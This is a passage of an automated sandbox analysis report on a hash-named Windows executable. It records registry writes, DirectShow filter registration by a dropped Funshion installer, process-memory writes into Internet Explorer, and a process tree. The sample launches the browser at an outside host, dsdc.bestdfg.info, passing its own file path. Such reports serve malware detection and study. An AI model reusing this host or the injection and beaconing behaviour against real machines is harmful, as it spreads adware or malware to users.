Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002d77e31d38c37d4a82ce2ce47d78d2a8000000000200000000001066000000010000200000009efa990571c62921dc93dbdc2f821cba0d8b7f52223dbfff2683b4eae0bbe14f000000000e800000000200002000000069c7e08b79c5f55c20ade70c743cf00ac9a6e52b8cf7161fe514163f9bc6553a20000000650cfdd9c7c17f1b504d1d05e3bc176002462c125b64387ea25104fd396fd8fe40000000e3cbeaf749f8d5bb611a2c55778c71d5d810c2e40bea85afb9c8fe1c1fa7ce57e2255a1ba3ea4b55ca822bf1e2b9e8ba59151670d9d1952137c491e403975cdf	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Modifies registry class 64 IoCs

Processes:

regsvr32.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\FriendlyName = "Wave Parser"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\file	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB85-524F-11CE-9F53-0020AF0BA770}\0 = "0, 4, , 52494646, 8, 8, , 43445841666D7420, 36, 20, FFFFFFFF00000000FFFFFFFFFFFFFFFFFFFFFFFF, 646174610000000000FFFFFFFFFFFFFFFFFFFF00"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}\CLSID = "{336475D0-942A-11CE-A870-00AA002FEAB5}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\gopher\Source Filter = "{E436EBB6-524F-11CE-9F53-0020AF0BA770}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1643E180-90F5-11CE-97D5-00AA0055595A}\FriendlyName = "Color Space Converter"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FEB50740-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}\FilterData = 020000000000600003000000000000003070693300000000000000000400000000000000000000003074793300000000d8000000e80000003174793300000000d8000000f80000003274793300000000d8000000080100003374793300000000d8000000180100003170693309000000000000000200000000000000000000003074793300000000280100003801000031747933000000002801000048010000327069330900000000000000020000000000000000000000307479330000000058010000380100003174793300000000580100006801000083eb36e44f52ce119f530020af0ba77084eb36e44f52ce119f530020af0ba77085eb36e44f52ce119f530020af0ba77086eb36e44f52ce119f530020af0ba77087eb36e44f52ce119f530020af0ba7706175647300001000800000aa00389b7180eb36e44f52ce119f530020af0ba7705000000000001000800000aa00389b717669647300001000800000aa00389b7181eb36e44f52ce119f530020af0ba770	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB6-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}\FilterData = 0200000000006000030000000000000030706933000000000000000001000000000000000000000030747933000000008800000098000000317069330000000000000000010000000000000000000000307479330000000088000000a8000000327069330800000000000000010000000000000000000000307479330000000088000000b80000007669647300001000800000aa00389b71406a9b5a221ad111bad900609744111a416a9b5a221ad111bad900609744111a00000000000000000000000000000000	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A5-7548-11CF-A520-0080C77EF58A}\FriendlyName = "File stream renderer"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\file\Source Filter = "{E436EBB6-524F-11CE-9F53-0020AF0BA770}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDBD8D00-C193-11D0-BD4E-00A0C911CE86}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{51B4ABF3-748F-4E3B-A276-C828330E926A}\CLSID = "{51B4ABF3-748F-4E3B-A276-C828330E926A}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{51B4ABF3-748F-4E3B-A276-C828330E926A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B80AB0A0-7416-11D2-9EEB-006008039E37}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\CLSID = "{CF49D4E0-1115-11CE-B03A-0020AF0BA770}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{FEB50740-7BEF-11CE-9BD9-0000E202599C}\CLSID = "{FEB50740-7BEF-11CE-9BD9-0000E202599C}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\FriendlyName = "File Source (URL)"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB8D-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\FriendlyName = "Wave Parser"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{48025243-2D39-11CE-875D-00608CB78066}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{418AFB70-F8B8-11CE-AAC6-0020AF0B99A3}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\FilterData = 020000000000400001000000000000003070693308000000000000000100000000000000000000003074793300000000380000004800000083eb36e44f52ce119f530020af0ba77000000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E436EBB6-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\FilterData = 0200000001006803020000000000000030706933000000000000000003000000000000000000000030747933000000008000000090000000317479330000000080000000a0000000327479330000000080000000b0000000317069330800000000000000010000000000000000000000307479330000000080000000c00000006175647300001000800000aa00389b7180eb36e44f52ce119f530020af0ba77081eb36e44f52ce119f530020af0ba7705000000000001000800000aa00389b710100000000001000800000aa00389b71	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{07B65360-C445-11CE-AFDE-00AA006C14F4}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}\FilterData = 0200000000006000030000000000000030706933000000000000000001000000000000000000000030747933000000008800000098000000317069330000000000000000010000000000000000000000307479330000000088000000a8000000327069330800000000000000010000000000000000000000307479330000000088000000b80000007669647300001000800000aa00389b71406a9b5a221ad111bad900609744111a416a9b5a221ad111bad900609744111a00000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4444AC9E-242E-471B-A3C7-45DCD46352BC}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37E92A92-D9AA-11D2-BF84-8EF2B1555AED}\InprocServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\FriendlyName = "MPEG Audio Decoder"	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\FilterData = 0200000001006803020000000000000030706933000000000000000003000000000000000000000030747933000000008000000090000000317479330000000080000000a0000000327479330000000080000000b0000000317069330800000000000000010000000000000000000000307479330000000080000000c00000006175647300001000800000aa00389b7180eb36e44f52ce119f530020af0ba77081eb36e44f52ce119f530020af0ba7705000000000001000800000aa00389b710100000000001000800000aa00389b71	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\FriendlyName = "ACM Wrapper"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A3ECBC41-581A-4476-B693-A63340462D8B}\InprocServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{301056D0-6DFF-11D2-9EEB-006008039E37}\CLSID = "{301056D0-6DFF-11D2-9EEB-006008039E37}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D3588AB0-0781-11CE-B03A-0020AF0BA770}\CLSID = "{D3588AB0-0781-11CE-B03A-0020AF0BA770}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\Extensions\.mp3	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{48025243-2D39-11CE-875D-00608CB78066}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1643E180-90F5-11CE-97D5-00AA0055595A}\CLSID = "{1643E180-90F5-11CE-97D5-00AA0055595A}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{301056D0-6DFF-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A3-7548-11CF-A520-0080C77EF58A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{4A2286E0-7BEF-11CE-9BD9-0000E202599C}\FriendlyName = "MPEG Audio Decoder"	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\FilterData = 020000000000400001000000000000003070693308000000000000000100000000000000000000003074793300000000380000004800000083eb36e44f52ce119f530020af0ba77000000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8670C736-F614-427B-8ADA-BBADC587194B}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1643E180-90F5-11CE-97D5-00AA0055595A}	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

FunshionInstall_C105806.exe

pid	process
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe
936	FunshionInstall_C105806.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

IEXPLORE.EXE

pid process

4400 IEXPLORE.EXE

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

IEXPLORE.EXE

pid	process
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
1980	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
544	IEXPLORE.EXE
544	IEXPLORE.EXE
544	IEXPLORE.EXE
544	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
476	IEXPLORE.EXE
476	IEXPLORE.EXE
476	IEXPLORE.EXE
476	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
3016	IEXPLORE.EXE
3016	IEXPLORE.EXE
3016	IEXPLORE.EXE
3016	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
544	IEXPLORE.EXE
544	IEXPLORE.EXE
544	IEXPLORE.EXE
544	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
5012	IEXPLORE.EXE
5012	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
476	IEXPLORE.EXE
476	IEXPLORE.EXE
476	IEXPLORE.EXE
476	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
5020	IEXPLORE.EXE
5020	IEXPLORE.EXE
5020	IEXPLORE.EXE
5020	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
3016	IEXPLORE.EXE
3016	IEXPLORE.EXE
3016	IEXPLORE.EXE
3016	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
4960	IEXPLORE.EXE
4960	IEXPLORE.EXE
4960	IEXPLORE.EXE
4960	IEXPLORE.EXE
4400	IEXPLORE.EXE
4400	IEXPLORE.EXE
5012	IEXPLORE.EXE
5012	IEXPLORE.EXE
5012	IEXPLORE.EXE
5012	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exeiexplore.exeIEXPLORE.EXEiexplore.exeiexplore.exeiexplore.exeFunshionInstall_C105806.exeiexplore.exeiexplore.exeiexplore.exeiexplore.exe

description	pid	process	target process
PID 4204 wrote to memory of 4884	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4884	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4884	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4884 wrote to memory of 4400	4884	iexplore.exe	IEXPLORE.EXE
PID 4884 wrote to memory of 4400	4884	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 1980	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 1980	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 1980	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4204 wrote to memory of 4288	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4288	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4288	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4288 wrote to memory of 3972	4288	iexplore.exe	IEXPLORE.EXE
PID 4288 wrote to memory of 3972	4288	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 544	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 544	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 544	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4204 wrote to memory of 4372	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4372	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4372	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4372 wrote to memory of 1884	4372	iexplore.exe	IEXPLORE.EXE
PID 4372 wrote to memory of 1884	4372	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 476	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 476	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 476	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4204 wrote to memory of 3772	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 3772	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 3772	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 3772 wrote to memory of 800	3772	iexplore.exe	IEXPLORE.EXE
PID 3772 wrote to memory of 800	3772	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 3016	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 3016	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 3016	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4204 wrote to memory of 936	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	FunshionInstall_C105806.exe
PID 4204 wrote to memory of 936	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	FunshionInstall_C105806.exe
PID 4204 wrote to memory of 936	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	FunshionInstall_C105806.exe
PID 936 wrote to memory of 3740	936	FunshionInstall_C105806.exe	regsvr32.exe
PID 936 wrote to memory of 3740	936	FunshionInstall_C105806.exe	regsvr32.exe
PID 936 wrote to memory of 3496	936	FunshionInstall_C105806.exe	regsvr32.exe
PID 936 wrote to memory of 3496	936	FunshionInstall_C105806.exe	regsvr32.exe
PID 936 wrote to memory of 3496	936	FunshionInstall_C105806.exe	regsvr32.exe
PID 4204 wrote to memory of 3984	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 3984	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 3984	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 3984 wrote to memory of 3156	3984	iexplore.exe	IEXPLORE.EXE
PID 3984 wrote to memory of 3156	3984	iexplore.exe	IEXPLORE.EXE
PID 4204 wrote to memory of 1604	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 1604	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 1604	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 1604 wrote to memory of 4688	1604	iexplore.exe	IEXPLORE.EXE
PID 1604 wrote to memory of 4688	1604	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 5012	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 5012	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4400 wrote to memory of 5012	4400	IEXPLORE.EXE	IEXPLORE.EXE
PID 4204 wrote to memory of 3916	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 3916	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 3916	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 3916 wrote to memory of 536	3916	iexplore.exe	IEXPLORE.EXE
PID 3916 wrote to memory of 536	3916	iexplore.exe	IEXPLORE.EXE
PID 4204 wrote to memory of 4636	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4636	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4204 wrote to memory of 4636	4204	d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe	iexplore.exe
PID 4636 wrote to memory of 1864	4636	iexplore.exe	IEXPLORE.EXE
PID 4636 wrote to memory of 1864	4636	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 5020	4400	IEXPLORE.EXE	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe
"C:\Users\Admin\AppData\Local\Temp\d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4204

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=1123&i=ie&09917b01d49ecafe32c621a1f69b94723bb61e17=09917b01d49ecafe32c621a1f69b94723bb61e17&uu=C:\Users\Admin\AppData\Local\Temp\d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8&09917b01d49ecafe32c621a1f69b94723bb61e17
2⤵
- Suspicious use of WriteProcessMemory
PID:4884

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=1123&i=ie&09917b01d49ecafe32c621a1f69b94723bb61e17=09917b01d49ecafe32c621a1f69b94723bb61e17&uu=C:\Users\Admin\AppData\Local\Temp\d7f87f470424473e7776e2f0cd1c0cf460f10a1424a1a1b5841ee3b0302299a8&09917b01d49ecafe32c621a1f69b94723bb61e17
3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4400

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4400 CREDAT:17410 /prefetch:2
4⤵
- Suspicious use of SetWindowsHookEx
PID:1980

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4400 CREDAT:82956 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:544

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
